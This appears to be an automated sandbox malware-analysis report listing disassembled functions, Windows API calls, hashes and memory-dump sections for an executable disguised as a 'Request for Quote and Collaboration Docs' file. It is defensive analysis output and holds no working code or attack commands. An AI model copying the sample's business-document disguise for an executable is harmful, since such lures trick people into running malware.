                                                                                          • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                          • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                          • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                          • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                          • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                          • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                          • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 334405425-0
                                                                                          • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                          • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                          • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                          • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                          APIs
                                                                                          • GlobalFree.KERNEL32(0071AA58), ref: 00401B92
                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocFree
                                                                                          • String ID: Call
                                                                                          • API String ID: 3394109436-1824292864
                                                                                          • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                          • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                          • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                          • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2258160193.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2258134522.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258242112.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2258276811.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_10000000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumErrorLastWindows
                                                                                          • String ID:
                                                                                          • API String ID: 14984897-0
                                                                                          • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                          • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                          • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                          • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                          APIs
                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000207,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                          • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                          • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                          • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                          APIs
                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                          • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                          • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                          • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                          APIs
                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnableShow
                                                                                          • String ID:
                                                                                          • API String ID: 1136574915-0
                                                                                          • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                          • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                          • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                          • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe,80000000,00000003), ref: 00405B5A
                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreate
                                                                                          • String ID:
                                                                                          • API String ID: 415043291-0
                                                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointerwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 327478801-0
                                                                                          • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                          • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                          • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                          • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                          APIs
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringWrite
                                                                                          • String ID:
                                                                                          • API String ID: 390214022-0
                                                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                          APIs
                                                                                          • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: PathSearch
                                                                                          • String ID:
                                                                                          • API String ID: 2203818243-0
                                                                                          • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                          • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                          • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                          • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000207,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                          • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                          • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                          APIs
                                                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                          • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                          • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                          APIs
